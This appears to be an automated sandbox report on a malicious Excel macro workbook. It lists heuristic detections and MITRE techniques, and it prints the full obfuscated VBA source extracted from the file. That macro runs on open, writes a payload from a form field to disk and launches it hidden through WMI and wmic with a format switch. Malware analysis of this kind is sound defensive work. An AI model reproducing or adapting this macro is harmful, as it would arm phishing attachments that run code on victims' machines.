MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an XLSM file containing VBA macros, indicated by the OOXML_VBA heuristic. The Workbook_Open macro is present and configured to execute automatically, which is a common technique for initiating malicious actions. The GetObject call and VBA p-code auto-execution further suggest the macro is designed to run code, likely to download and execute a secondary payload.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set ZXlHygmrQ_zk = GetObject(LVT__top.bHbPEdJrniXiybzJi).SpawnInstance_ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8550 bytes |
SHA-256: 5bd6db8abd41d9221fe1cae37aee4976a2b63e28c8db986770803946c44800ed |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
132 of 249 identifiers look randomly generated (e.g. 'EaBSKCRvoNtfDQ_weQk_UQAHNpdoShq') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
CkJeVN = IsDate(PDThfuo)
l5pTYwq = IsDate(IsDate(KaQ60e))
X95dkUQKIsNB = IsEmpty(svOKXMz0t48D)
UtDVyZVYaZ_K__CJt.FiTLPbiiunpbU_WahZIfBZwFp
aKxL5bv = IsDate(G71yDHUJ247v)
QtiWDN = IsError("Us5doL")
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "MvrMYqwyVIiNxv_jTFtwu"
Function IcqPO_SUcZ_fQeWK()
IsNull (MYfwSc_2XRuYW)
F7Jol37 = IsNull(IsDate(ZGNA1B4))
IsError ("Fm3QPp8")
IcqPO_SUcZ_fQeWK = Range("FV88")
KWNpSC0EwFL7 = IsEmpty("iwoep0HVIw04")
IsArray ("ZYqv1uB_pyb21i")
IsObject (IsNumeric("BZlJJ8W"))
End Function
Function CFLB_HA()
rkfWGE = IsArray(mrry7aHryYWM)
IlO1p5uBnVux = IsArray(IsNumeric("gv60K16JLNZ"))
IsMissing (IsNull("UxdP0z4_QRSG68"))
zdToFIj = IsObject(PLtn3h_BsLj4R)
Goij2xGIULk = IsDate(IsNumeric(YtUwrr3snbSi))
IsDate ("KZEx0Tv")
QCsnCZWasgZQSSWg_VRUU_x = gi_alhSIKiUjfmLIzb.dxlnSlJTzrg_yxLaFYrj_ufxTYyO
IsMissing (IsArray(GCx3mB_36UP4))
CFLB_HA = QCsnCZWasgZQSSWg_VRUU_x + S_jaRTeHFSIl.R_LyfsLexnXIlkM_Ae_lMYk + Mid("wrwcLIU8N+K:at:H9Zddf@", 13, 3)
IsMissing (IsMissing("Xmjd9Mr"))
IsError (IsMissing(YT2J0v5))
IsDate ("Run9B5B")
End Function
Attribute VB_Name = "Cx_tuSRjLwX_PYRaRb"
Attribute VB_Base = "0{164DA696-B550-473F-B420-DEAC0205DB47}{3A7BEEBF-9E3E-4EB3-B5D8-F0311285CC7A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function bMJIH_jfgHWIyJXeVFMQIij()
IsDate ("KTcaqzdU7Z58")
IK7qlt = IsEmpty(IsMissing("GJwe92"))
GsPSBm = IsDate(IsError(ZAKt936_xedOw))
ACad7C = IsObject("Tm7V1zXJqMTY")
IsNull (IsDate(Tn3vjT_qGysN))
YB9GXn_Vd39cu = IsArray(IsError("dcG2C8H"))
Fe7KRDKTGjPm = IsError(L40Cvz)
pRStfvfnl26wU = IsObject("QnPED1")
AKliyoU_8k8Vq = IsDate(UIZjW0)
X__NFyxzilhbPrUTTXAsqAvLmem_bH = MvrMYqwyVIiNxv_jTFtwu.IcqPO_SUcZ_fQeWK
IsNull (EVkrcXD)
bMJIH_jfgHWIyJXeVFMQIij = X__NFyxzilhbPrUTTXAsqAvLmem_bH
AQ2fEhD = IsDate("X5dIUUGew0gt")
R9MIeZ = IsDate("XZZtOxz")
GWMUnVC8DXM = IsMissing(JHmmnGa)
End Function
Function undKsrBKESQ()
IsNull (IsDate("bQOb4dm"))
IsNull (Ks5Ioe)
YFphdNN0zn4TK = IsNull("W8roOT_Glz4BA")
IsArray ("DdUWqa_2lnBD")
fUYjgPZrwZTlY_Oo_Is = HqIHvR_RefJW_wfZZZ_FIzPkfi.EaBSKCRvoNtfDQ_weQk_UQAHNpdoShq
IsEmpty (IsArray("CB6rHom"))
PhxPnRX = IsObject(XO3z0Dmo2y3NL)
IsDate (RzpfhDO)
IsDate (IsError(RLdPMjj_RHFu5))
undKsrBKESQ = Join(Array(fUYjgPZrwZTlY_Oo_Is))
Snnlsd_hNIG4 = IsNumeric(OY8zpv)
pro6V2 = IsError(LiUvPeQ)
IsArray (Y7mCP3)
End Function
Attribute VB_Name = "S_jaRTeHFSIl"
Function PYtDVIIN_dWgjTMsKYW()
GJpZyZFuwzfK = IsMissing(IsNull("Cnt0V0w_CFaaN"))
IsNumeric ("VfDrVyw")
IsNull ("PlTUVC")
PYtDVIIN_dWgjTMsKYW = Range("CM223")
Xq0NmZl = IsDate("uydZefrfHKjG")
ditDk6t_KKarc8 = IsDate(vpPMmvHLqJpcx)
IsDate (IsMissing(m0M8rS))
End Function
Function R_LyfsLexnXIlkM_Ae_lMYk()
KS43xtSG0bik = IsNumeric("BsnQsr_68GgI")
R_LyfsLexnXIlkM_Ae_lMYk = Replace("o|01(o|01(o|01(o|01(o|01(et /form", "o|01(", "")
IsEmpty ("VDzPZq7")
g2Wtmpx = IsMissing(IsError(LYa3323))
End Function
Attribute VB_Name = "LVT__top"
Function bHbPEdJrniXiybzJi()
ye7oOxH = IsDate("q8vwSj")
EEJ7p0 = IsEmpty(IsObject(fHcSjZ0Inw1))
E2j5i80JlGo = IsEmpty("K3nC0CV")
Z8E1yD = IsDate(IsDate("Dmp71UfQa696"))
IsDate (IsEmpty("gB9yI9h_QvpS0L"))
IsError (TLXNL7AHOqw)
jnrwnFbB_HHllFxmaPUkVFPV_eIOrtn = Chr(118)
ls_XxLiDNIkLD = Chr(CLng(((1.39867109634551 * 602) + -728)))
NITxvSAp_OtdyiA = Chr(116)
oiPjcYtU = Chr(116)
IsDate (IsEmpty(wcsOqZ0T69I))
IsNumeric (IsArray("Tybe1KNfhH4a"))
MVSStEz = Chr(CLng(((-980 + (996 + -240#)) - -339)))
IsObject (IsObject(ExDH5zLHMo3r))
bObTESp_NKk = Chr(CLng((-698 - -781)))
vGDcWVO = Chr(CLng(((449 + -381#) Xor xlTimeLeadingZero)))
UYFgMF = IsError(IsObject(UDK4XJe_XuQM2))
fVpkUZpJjsMZu_vtfwlPvjooeW = ChrW(CLng((xlUnlockedCells Or ((-0.900952380952381 * xlDialogDataValidation) + 589#)))) _
X_N_UruH_Tmmi = ChrW(112)
CRnpjH = IsNumeric(IsArray("ovWJyL"))
bHbPEdJrniXiybzJi = S_jaRTeHFSIl.PYtDVIIN_dWgjTMsKYW & jnrwnFbB_HHllFxmaPUkVFPV_eIOrtn & ChrW(50) & ChrW(58) _
& Chr(CLng((xlPaper10x14 Or xlDialogScale))) _
& vGDcWVO & Chr(110) & Chr(CLng((48 Or xlTextMac))) _
& Chr(CLng(((0.806451612903226 * -775) + 675))) _
& Chr(CLng((xlCylinderBarClustered And (-0.25 * -508)))) & ChrW(CLng(((-746 - 168#) + 994))) & Chr(114) & ChrW(CLng((1067 + (0.634372926343729 * -1507)))) & Chr(CLng((xlMonthNameChars Xor 125))) & ChrW(CLng((0.163166397415186 * (0.462976813762154 * 1337)))) & MVSStEz & Chr(115) & bObTESp_NKk & NITxvSAp_OtdyiA & Chr(97) & ls_XxLiDNIkLD & oiPjcYtU & fVpkUZpJjsMZu_vtfwlPvjooeW & X_N_UruH_Tmmi
Jf76yWG = IsNumeric("QPSNcLo_u0CzkA")
Gf4oDo1ASmo = IsMissing(Y7EYOz)
Mk6lLkFqQ3lr = IsObject(FK24bPk)
End Function
Attribute VB_Name = "HqIHvR_RefJW_wfZZZ_FIzPkfi"
Attribute VB_Base = "0{E536D3F1-551F-4373-8AA1-04880FB3ED06}{6AACE69B-5E5D-49AF-B0C4-16BE44B0249D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function ZXlHygmrQ_zk()
HQTkogbmzGne = IsArray("EpCq0d_KuBQG")
IsDate (IsArray("NP7Vk8_55z7oJ"))
z4Rray_jXXw0 = IsEmpty("YeECdCQ")
Set ZXlHygmrQ_zk = GetObject(LVT__top.bHbPEdJrniXiybzJi).SpawnInstance_
L2Zwvpx_1Dr7J = IsDate(IsError("s6tdLA"))
IsDate (xWoesGB_uuXnJ)
IsArray (IsNumeric(WiyfvC))
With ZXlHygmrQ_zk
.ShowWindow = CLng((((-17 - -17.2732558139535) * 1204) + -317))
End With
IsObject (Tznon6)
IsEmpty (IsDate("FmRWPM"))
jNogBm_qMUVI = IsError(IsNumeric(VKbtp9))
End Function
Function EaBSKCRvoNtfDQ_weQk_UQAHNpdoShq()
IsMissing (IsDate("I4sKhe_gu027k"))
EaBSKCRvoNtfDQ_weQk_UQAHNpdoShq = Range("HQ154")
IsEmpty (Qc9Nlr_wmuAn)
PYi80V2_Db3PRJ = IsMissing(IsEmpty("UI46o6S"))
End Function
Attribute VB_Name = "gi_alhSIKiUjfmLIzb"
Function dxlnSlJTzrg_yxLaFYrj_ufxTYyO()
IsMissing (Be4xM4)
IsDate ("JIgGjS_RqKUpn")
IsDate (IsNull("GGgm8R"))
dxlnSlJTzrg_yxLaFYrj_ufxTYyO = Mid("-kL$C6vQn !(wmic os g-1YsN4+T1h", 13, 9)
IsArray ("EhPRVe")
SUKb6qB_kvji1 = IsMissing(NO816B6b0BlP)
CSLSYWA = IsError(IsMissing(WU6CuSKw558R))
End Function
Attribute VB_Name = "UtDVyZVYaZ_K__CJt"
Function FiTLPbiiunpbU_WahZIfBZwFp()
Dim QjNmcoQ As String
IsDate (IsDate(H9bUuvZxd3WV))
IsError ("Gm4YMv01Ikd8")
QjNmcoQ = Replace(Cx_tuSRjLwX_PYRaRb.afx_o_NDWq.Text, "eJBQ_Y6Dnl ii", "")
IsMissing (IsEmpty(HjZmZFL_KzuKDg))
RZdhsB_2b3Y1F = IsEmpty("JVKtoz")
iVVQlQ = IsDate("nO0gnpX9wf0")
Open Application.ActiveWorkbook.Path & Cx_tuSRjLwX_PYRaRb.bMJIH_jfgHWIyJXeVFMQIij For Binary As #CLng((Not ((-330 + 670#) + -342#)))
ibWYW91 = IsNumeric(IsArray(Vh96PH))
IsDate (IsDate(Nvupgu19Dtfib))
Put #CLng((xlNoMailSystem Or xlCmdCube)), , QjNmcoQ
HDDJsPtgGHy2c = IsObject(IsEmpty(biS9jv_9XVkx))
yaTFFGk = IsError(IsNumeric("Pz7KC0kQXqM"))
Close #CLng(((-387 - -386.998863636364) * -880))
iM0MHyjXo2Jk = IsNull(TwmOjOY_7c314I)
OjazlkKnNvMe = IsDate("tk7v0zd_AwywW0")
rHl_u_u_lticz
niFirZ_ws66F = IsEmpty(mvPJXGR)
C0gDev = IsError(IsNumeric(P30lU1m))
End Function
Function rHl_u_u_lticz()
CXOnEEX = IsArray("JUNlqh_bT5qp")
IsEmpty ("MxDwWx_fxliP")
p8LyPql = IsArray("OyS0c9DnXem")
With GetObject(Cx_tuSRjLwX_PYRaRb.undKsrBKESQ)
.Create MvrMYqwyVIiNxv_jTFtwu.CFLB_HA & Chr(34) & Application.ActiveWorkbook.Path & Cx_tuSRjLwX_PYRaRb.bMJIH_jfgHWIyJXeVFMQIij & Chr(34), Null, HqIHvR_RefJW_wfZZZ_FIzPkfi.ZXlHygmrQ_zk
End With
IsMissing (IsError("NHqVWnr"))
IsDate ("OXqYZWi_eyKEj")
IsEmpty (IsDate(CIqi0xHr7A0C))
VfFoYZ3 = IsMissing("D3n1EKc_5n2x1n")
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 65024 bytes |
SHA-256: 1377350ffff4a6f4da492480716c346a048aaa9d1e032fd1da68396831225d39 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.